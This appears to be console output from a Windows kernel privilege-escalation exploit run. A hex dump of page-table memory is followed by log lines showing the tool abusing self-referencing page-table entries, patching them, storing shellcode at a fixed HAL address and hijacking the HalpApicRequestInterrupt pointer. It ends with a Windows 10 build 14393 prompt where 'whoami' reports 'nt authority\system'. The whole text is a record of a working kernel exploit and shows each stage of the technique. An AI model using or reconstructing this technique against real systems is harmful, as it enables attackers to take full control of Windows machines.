000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............
000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c.......
000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@..............
000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......
000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......
+] Selected spurious PML4E: fffff67b3d9ecf00
+] Spurious PT: fffff67b3d9e0000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Original HalpIntteruptRequest pointer: fffff80150e1fc40
+] Selected spurious PML4E: fffff67b3d9ecf08
+] Spurious PT: fffff67b3d9e1000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
*** Patching the original location to enable NX...
+] Patching the Spurious Offset with 1967
HAL address: fffff67b3d9e1000
+] w00t: Shellcode stored at: ffffffffffd00d50
+] Selected spurious PML4E: fffff67b3d9ecf10
+] Spurious PT: fffff67b3d9e2000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Patch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\qa\Desktop>
C:\Users\qa\Desktop>whoami
nt authority\system
C:\Users\qa\Desktop>